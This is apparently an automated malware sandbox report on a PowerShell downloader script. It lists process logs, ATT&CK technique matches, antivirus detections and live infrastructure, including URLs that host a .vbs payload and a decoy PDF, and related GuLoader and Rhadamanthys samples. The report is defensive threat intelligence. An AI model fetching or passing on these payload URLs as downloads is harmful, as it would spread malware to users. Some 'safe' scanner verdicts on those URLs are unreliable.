      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package0513~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Windows.StartLayout.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.Windows.StartLayout.Commands.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package0012~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-UEV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\UEV\Microsoft.Uev.Commands.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Whea\Microsoft.Windows.Whea.WheaMemoryPolicy.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\WindowsErrorReporting\Microsoft.WindowsErrorReporting.PowerShell.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\WindowsSearch\Microsoft.WindowsSearch.Commands.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.WindowsSearch.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsSearch.Commands.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Program Files (x86)\AutoIt3\AutoItX\AutoItX3.PowerShell.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation
      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformation
      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformation
MITRE ATT&CK Matrix (a leading number is the count of matched signatures for that technique):

Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties
Resource Development: 1 Scripting; Domains; DNS Server; Virtual Private Server; Server; Botnet
Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media
Execution: 1 PowerShell; Scheduled Task/Job; At; Cron; Launchd; Scheduled Task
Persistence: 1 Scripting; 1 Registry Run Keys / Startup Folder; 1 DLL Side-Loading; Login Hook; Network Logon Script; RC Scripts
Privilege Escalation: 11 Process Injection; 1 Registry Run Keys / Startup Folder; 1 DLL Side-Loading; Login Hook; Network Logon Script; RC Scripts
Defense Evasion: 11 Masquerading; 31 Virtualization/Sandbox Evasion; 11 Process Injection; 1 Obfuscated Files or Information; 1 DLL Side-Loading; Steganography
Credential Access: OS Credential Dumping; LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials
Discovery: 11 Security Software Discovery; 1 Process Discovery; 31 Virtualization/Sandbox Evasion; 1 Application Window Discovery; 1 File and Directory Discovery; 21 System Information Discovery
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC
Collection: Data from Local System; Data from Removable Media; Data from Network Shared Drive; Input Capture; Keylogging; GUI Input Capture
Command and Control: 1 Encrypted Channel; 3 Ingress Tool Transfer; 3 Non-Application Layer Protocol; 4 Application Layer Protocol; Fallback Channels; Multiband Communication
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits
Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop
Behavior Graph ID: 1578224; Sample: 8iAcoQLc3o.ps1; Start date: 19/12/2024; Architecture: WINDOWS; Score: 84
Contacted domains and IPs: x1.i.lencr.org; www.bluemaxxlaser.com (203.175.174.69:80, local port 49723, SGGS-AS-APSGGSSG, Singapore); astenterprises.com.pk (107.161.23.150:443, local port 49718, RAMNODEUS, United States); 3 other IPs or domains; 127.0.0.1 (unknown, contacted by svchost.exe)
Top-level signatures: Antivirus / Scanner detection for submitted sample; Multi AV Scanner detection for submitted file; Yara detected Powershell download and execute; 3 other signatures
Process tree: powershell.exe (signature: Powershell creates an autostart link) started powershell.exe (signature: Loading BitLocker PowerShell Module), Acrobat.exe and conhost.exe; Acrobat.exe started AcroCEF.exe, which started a second AcroCEF.exe; svchost.exe was started separately and contacted 127.0.0.1

Source | Detection | Scanner | Label | Link
8iAcoQLc3o.ps1 | 42% | Virustotal | | Browse
8iAcoQLc3o.ps1 | 37% | ReversingLabs | Script-PowerShell.Downloader.Boxter |
8iAcoQLc3o.ps1 | 100% | Avira | TR/PShell.Dldr.VPA |
      No Antivirus matches
      No Antivirus matches
      No Antivirus matches
Source | Detection | Scanner | Label | Link
https://www.astenterprises.com.pk/ms/List | 0% | Avira URL Cloud | safe |
http://www.blud1dmaxxlasd1dr.com/ms/ms.vbs | 0% | Avira URL Cloud | safe |
https://www.astd1dntd1drprisd1ds.com.pk/ms/List%20of%20rd1dquird1dd%20itd1dms%20and%20sd1drvicd1ds.p | 0% | Avira URL Cloud | safe |
http://crl.microsoftA | 0% | Avira URL Cloud | safe |
http://www.bluemaxxlaser.com/ms/ms.vbs | 0% | Avira URL Cloud | safe |
https://www.astenterprises.com.pk/ms/List%20of%20required%20items%20and%20services.pdf | 0% | Avira URL Cloud | safe |
http://www.bluemaxxlaser.com | 0% | Avira URL Cloud | safe |
Name | IP | Active | Malicious | Antivirus Detection | Reputation
bg.microsoft.map.fastly.net | 199.232.214.172 | true | false | | high
astenterprises.com.pk | 107.161.23.150 | true | false | | high
www.bluemaxxlaser.com | 203.175.174.69 | true | false | | high
x1.i.lencr.org | unknown | unknown | false | | high
www.astenterprises.com.pk | unknown | unknown | false | | high
Name | Malicious | Antivirus Detection | Reputation
http://www.bluemaxxlaser.com/ms/ms.vbs | false | Avira URL Cloud: safe | unknown
https://www.astenterprises.com.pk/ms/List%20of%20required%20items%20and%20services.pdf | false | Avira URL Cloud: safe | unknown
IP | Domain | Country | Flag | ASN | ASN Name | Malicious
203.175.174.69 | www.bluemaxxlaser.com | Singapore | | 24482 | SGGS-AS-APSGGSSG | false
107.161.23.150 | astenterprises.com.pk | United States | | 3842 | RAMNODEUS | false
IP
127.0.0.1
                                                                  Joe Sandbox version:41.0.0 Charoite
                                                                  Analysis ID:1578224
                                                                  Start date and time:2024-12-19 12:44:08 +01:00
                                                                  Joe Sandbox product:CloudBasic
                                                                  Overall analysis duration:0h 5m 29s
                                                                  Hypervisor based Inspection enabled:false
                                                                  Report type:full
                                                                  Cookbook file name:default.jbs
                                                                  Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed:22
                                                                  Number of new started drivers analysed:0
                                                                  Number of existing processes analysed:0
                                                                  Number of existing drivers analysed:0
                                                                  Number of injected processes analysed:0
                                                                  Technologies:
                                                                  • HCA enabled
                                                                  • EGA enabled
                                                                  • AMSI enabled
                                                                  Analysis Mode:default
                                                                  Analysis stop reason:Timeout
                                                                  Sample name:8iAcoQLc3o.ps1
                                                                  renamed because original name is a hash value
                                                                  Original Sample Name:7ce5c4a2b61a6d000da4ca3d4e5869a55349d9a03af50d7560b5485fe6e86935.ps1
                                                                  Detection:MAL
                                                                  Classification:mal84.evad.winPS1@21/61@3/3
                                                                  EGA Information:Failed
                                                                  HCA Information:
                                                                  • Successful, ratio: 83%
                                                                  • Number of executed functions: 5
                                                                  • Number of non-executed functions: 0
                                                                  Cookbook Comments:
                                                                  • Found application associated with file extension: .ps1
                                                                  • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, Sgrmuserer.exe, conhost.exe, svchost.exe
                                                                  • Excluded IPs from analysis (whitelisted): 23.218.208.137, 162.159.61.3, 172.64.41.3, 23.218.208.109, 23.32.238.74, 23.32.238.18, 52.6.155.20, 52.22.41.97, 3.233.129.217, 3.219.243.226, 23.195.61.56, 2.19.198.27, 23.32.239.9, 23.32.239.56, 184.30.20.134, 23.32.239.65, 23.54.80.26, 23.54.80.57, 13.107.246.63, 172.202.163.200, 18.213.11.84
                                                                  • Excluded domains from analysis (whitelisted): e4578.dscg.akamaiedge.net, chrome.cloudflare-dns.com, e8652.dscx.akamaiedge.net, slscr.update.microsoft.com, e4578.dscb.akamaiedge.net, a767.dspw65.akamai.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, acroipm2.adobe.com, ssl-delivery.adobe.com.edgekey.net, e16604.g.akamaiedge.net, a122.dscd.akamai.net, prod.fs.microsoft.com.akadns.net, wu-b-net.trafficmanager.net, crl.root-x1.letsencrypt.org.edgekey.net, fs.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com.delivery.microsoft.com, acroipm2.adobe.com.edgesuite.net, ctldl.windowsupdate.com, p13n.adobe.io, fe3cr.delivery.mp.microsoft.com, download.windowsupdate.com.edgesuite.net, ssl.adobe.com.edgekey.net, armmf.adobe.com, geo2.adobe.com
                                                                  • Execution Graph export aborted for target powershell.exe, PID 7804 because it is empty
                                                                  • Execution Graph export aborted for target powershell.exe, PID 8072 because it is empty
• Not all processes were analyzed; report is missing behavior information
                                                                  • Report size exceeded maximum capacity and may have missing behavior information.
                                                                  • Report size getting too big, too many NtCreateKey calls found.
                                                                  • Report size getting too big, too many NtQueryAttributesFile calls found.
                                                                  • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Time | Type | Description
06:45:02 | API Interceptor | 67x Sleep call for process: powershell.exe modified
06:45:14 | API Interceptor | 2x Sleep call for process: svchost.exe modified
06:45:25 | API Interceptor | 2x Sleep call for process: AcroCEF.exe modified
Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
Match: 203.175.174.69
fs8cRx6Us2.ps1 | Get hash | malicious | Unknown | Browse | www.bluemaxxlaser.com/rh/List%20of%20required%20items%20and%20services.pdf
ER4HMMzeQ3.ps1 | Get hash | malicious | Unknown | Browse | www.bluemaxxlaser.com/rh/List%20of%20required%20items%20and%20services.pdf
FjfZ7uM8zh.lnk | Get hash | malicious | Unknown | Browse | www.bluemaxxlaser.com/ms/ms.vbs
yswmdaREME.lnk | Get hash | malicious | Unknown | Browse | www.bluemaxxlaser.com/ms/ms.vbs
0bNBLjPn56.lnk | Get hash | malicious | Unknown | Browse | www.bluemaxxlaser.com/ms/ms.vbs
64Tgzu2FKh.exe | Get hash | malicious | GuLoader, RHADAMANTHYS | Browse | bluemaxxlaser.com/rh/rheu.bin
zp.exe | Get hash | malicious | GuLoader, RHADAMANTHYS | Browse | bluemaxxlaser.com/rh/rh.bin
eua.ps1 | Get hash | malicious | GuLoader | Browse | www.bluemaxxlaser.com/rh/List%20of%20required%20items%20and%20services.pdf
zp.ps1 | Get hash | malicious | Unknown | Browse | www.bluemaxxlaser.com/rh/List%20of%20required%20items%20and%20services.pdf
zk.ps1 | Get hash | malicious | Unknown | Browse | www.bluemaxxlaser.com/rh/List%20of%20required%20items%20and%20services.pdf
Match: 107.161.23.150
tmkSAOF3GM.vbs | Get hash | malicious | GuLoader, RHADAMANTHYS | Browse |
FjfZ7uM8zh.lnk | Get hash | malicious | Unknown | Browse |
yswmdaREME.lnk | Get hash | malicious | Unknown | Browse |
0bNBLjPn56.lnk | Get hash | malicious | Unknown | Browse |
List of required items and services.pdf.vbs | Get hash | malicious | GuLoader, RHADAMANTHYS | Browse |
List of required items pdf.vbs | Get hash | malicious | GuLoader | Browse |
List of required items and services pdf.vbs | Get hash | malicious | GuLoader | Browse |
List of required items pdf.vbs | Get hash | malicious | GuLoader | Browse |
List of required items and services pdf.vbs | Get hash | malicious | GuLoader | Browse |
xw0K5Lahxz.exe | Get hash | malicious | Unknown | Browse |
Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
Match: www.bluemaxxlaser.com
fs8cRx6Us2.ps1 | Get hash | malicious | Unknown | Browse | 203.175.174.69
ER4HMMzeQ3.ps1 | Get hash | malicious | Unknown | Browse | 203.175.174.69
FjfZ7uM8zh.lnk | Get hash | malicious | Unknown | Browse | 203.175.174.69
yswmdaREME.lnk | Get hash | malicious | Unknown | Browse | 203.175.174.69
0bNBLjPn56.lnk | Get hash | malicious | Unknown | Browse | 203.175.174.69
eua.ps1 | Get hash | malicious | GuLoader | Browse | 203.175.174.69
zp.ps1 | Get hash | malicious | Unknown | Browse | 203.175.174.69
zk.ps1 | Get hash | malicious | Unknown | Browse | 203.175.174.69
mx.ps1 | Get hash | malicious | Unknown | Browse | 203.175.174.69
as.ps1 | Get hash | malicious | GuLoader | Browse | 203.175.174.69
Match: bg.microsoft.map.fastly.net
LFLtlBAuf7.exe | Get hash | malicious | Quasar | Browse | 199.232.210.172
FjfZ7uM8zh.lnk | Get hash | malicious | Unknown | Browse | 199.232.210.172
yswmdaREME.lnk | Get hash | malicious | Unknown | Browse | 199.232.214.172
0bNBLjPn56.lnk | Get hash | malicious | Unknown | Browse | 199.232.210.172
Dix7g8PK1e.pdf | Get hash | malicious | Unknown | Browse | 199.232.210.172
CROC000400 .pdf | Get hash | malicious | Unknown | Browse | 199.232.210.172
contract_signed.pdf | Get hash | malicious | Unknown | Browse | 199.232.214.172
T.T_Copy.12.18.2024.exe | Get hash | malicious | ArrowRAT | Browse | 199.232.214.172
22054200882739718047.js | Get hash | malicious | Strela Downloader | Browse | 199.232.214.172
Sh2uIqqKqc.exe | Get hash | malicious | Cryptbot | Browse | 199.232.214.172
Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
Match: RAMNODEUS
2rTi9MgX25.ps1 | Get hash | malicious | Unknown | Browse | 107.161.23.150
tmkSAOF3GM.vbs | Get hash | malicious | GuLoader, RHADAMANTHYS | Browse | 107.161.23.150
FjfZ7uM8zh.lnk | Get hash | malicious | Unknown | Browse | 107.161.23.150
yswmdaREME.lnk | Get hash | malicious | Unknown | Browse | 107.161.23.150
0bNBLjPn56.lnk | Get hash | malicious | Unknown | Browse | 107.161.23.150
List of required items and services.pdf.vbs | Get hash | malicious | GuLoader, RHADAMANTHYS | Browse | 107.161.23.150
List of required items pdf.vbs | Get hash | malicious | GuLoader | Browse | 107.161.23.150
List of required items and services pdf.vbs | Get hash | malicious | GuLoader | Browse | 107.161.23.150
List of required items pdf.vbs | Get hash | malicious | GuLoader | Browse | 107.161.23.150
List of required items and services pdf.vbs | Get hash | malicious | GuLoader | Browse | 107.161.23.150
Match: SGGS-AS-APSGGSSG
fs8cRx6Us2.ps1 | Get hash | malicious | Unknown | Browse | 203.175.174.69
ER4HMMzeQ3.ps1 | Get hash | malicious | Unknown | Browse | 203.175.174.69
FjfZ7uM8zh.lnk | Get hash | malicious | Unknown | Browse | 203.175.174.69
yswmdaREME.lnk | Get hash | malicious | Unknown | Browse | 203.175.174.69
0bNBLjPn56.lnk | Get hash | malicious | Unknown | Browse | 203.175.174.69
teste.x86.elf | Get hash | malicious | Mirai, Moobot, Okiru | Browse | 103.14.247.60
na.elf | Get hash | malicious | Gafgyt | Browse | 103.14.247.29
na.elf | Get hash | malicious | Gafgyt | Browse | 103.14.247.60
jZ6ejWIrSV.elf | Get hash | malicious | Gafgyt, Mirai | Browse | 103.14.247.64
IGvLaRmr0J.elf | Get hash | malicious | Gafgyt, Mirai | Browse | 103.14.247.58
Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
Match: 3b5074b1b5d032e5620f69f9f700ff0e
R7FBVcp1tf.ps1 | Get hash | malicious | Unknown | Browse | 107.161.23.150
2rTi9MgX25.ps1 | Get hash | malicious | Unknown | Browse | 107.161.23.150
fs8cRx6Us2.ps1 | Get hash | malicious | Unknown | Browse | 107.161.23.150
1AqzGcCKey.exe | Get hash | malicious | Quasar | Browse | 107.161.23.150
v4BET4inNV.vbs | Get hash | malicious | GuLoader | Browse | 107.161.23.150
ER4HMMzeQ3.ps1 | Get hash | malicious | Unknown | Browse | 107.161.23.150
BJtvb5Vdhh.exe | Get hash | malicious | Quasar | Browse | 107.161.23.150
HquJT7q6xG.exe | Get hash | malicious | Quasar | Browse | 107.161.23.150
hKvlV6A1Rl.exe | Get hash | malicious | Quasar | Browse | 107.161.23.150
kqeGVKtpy2.exe | Get hash | malicious | Quasar | Browse | 107.161.23.150
                                                                                      No context
                                                                                      Process:C:\Windows\System32\svchost.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):1310720
                                                                                      Entropy (8bit):0.8807679433693703
                                                                                      Encrypted:false
                                                                                      SSDEEP:1536:0JVRkX56mk0alaS0aHH0anjJ8PUWJ81s5J8RMvCxwtYD0pQoltqNeveEQYQ1aG9j:0J7adfWuK0p/QDfKoPeuP0aN4fqox4
                                                                                      MD5:72BDC4F10EB75ED9B8E7FFDD4481CE92
                                                                                      SHA1:EF33B8A4BA51CA664824D9B4B678C2013E4FC809
                                                                                      SHA-256:3CE482307887B8B26D3E0D67FF12FA1444087D938B30B092B79602EA963946E2
                                                                                      SHA-512:833BF1AD2819278E23F185547B830F78812D4ADE65C056853D171C880CEB90C44C5A32C9189D75DDCDF7810E0D60AA18626A9EA86996C6DEAD1173F40FA39AE3
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Process:C:\Windows\System32\svchost.exe
                                                                                      File Type:Extensible storage engine DataBase, version 0x620, checksum 0x592567a6, page size 16384, DirtyShutdown, Windows version 10.0
                                                                                      Category:dropped
                                                                                      Size (bytes):1310720
                                                                                      Entropy (8bit):0.7880724357943935
                                                                                      Encrypted:false
                                                                                      SSDEEP:1536:vSB2ESB2SSjlK/lv4T9DY1k0aXjJ8VQVYkr3g16iq2UPkLk+kYv/gKr51KrgzAkv:vazaPv4V4fXq2UaB
